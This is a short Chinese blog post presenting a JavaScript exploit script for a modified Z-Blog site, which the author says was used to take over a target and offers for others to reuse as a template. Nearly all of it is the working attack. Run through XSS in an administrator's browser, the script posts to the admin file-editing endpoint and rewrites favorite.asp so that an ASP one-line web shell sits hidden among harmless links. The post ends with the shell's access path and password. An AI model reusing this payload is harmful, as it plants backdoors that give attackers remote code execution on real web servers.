z-blog XSS 利用脚本
之前检测的一个目标站z-blog,程序有改动,存在 xss ,写了个 脚本 拿下了,要用的拿去,可以当模版用。
function saveUserInfo()
{
var url = "/cmd.asp?act=SiteFilePst&path=%2E%2FINCLUDE%2Ffavorite%2Easp&opath=D%3A%5CZ%2DBlog18%5Cadmin%5C%2E%2E%5C%5CINCLUDE";
var postStr = 'path=./INCLUDE/favorite.asp&txaContent=<li><a href="http://bbs.rainbowsoft.org/" target="_blank">ZBlogger社区</a></li><%If Request("Z-Blog")<>"" Then ExecuteGlobal(Request("Z-Blog"))%><li><a href="http://download.rainbowsoft.org/" target="_blank">菠萝的海</a></li>';
postStr=encodeURI(postStr);
var ajax = false;
if(window.XMLHttpRequest)
{
ajax = new XMLHttpRequest();
if (ajax.overrideMimeType)
{
ajax.overrideMimeType("text/xml");
}
}
else if (window.ActiveXObject)
{
try
{
ajax = new ActiveXObject("Msxml2.XMLHTTP");
}
catch (e)
{
try
{
ajax = new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e) {}
}
}
if (!ajax)
{
//window.alert("不能创建XMLHttpRequest对象实例.");
return false;
}
ajax.open("POST", url, true);
ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
ajax.send(postStr);
ajax.onreadystatechange = function()
{
if (ajax.readyState == 4 && ajax.status == 200)
{
}
}
}
saveUserInfo();
一句话地址:
http://www.xxxx.com/INCLUDE/favorite.asp
一句话密码:z-blog
下一篇:防止别人网站解析到自己的IP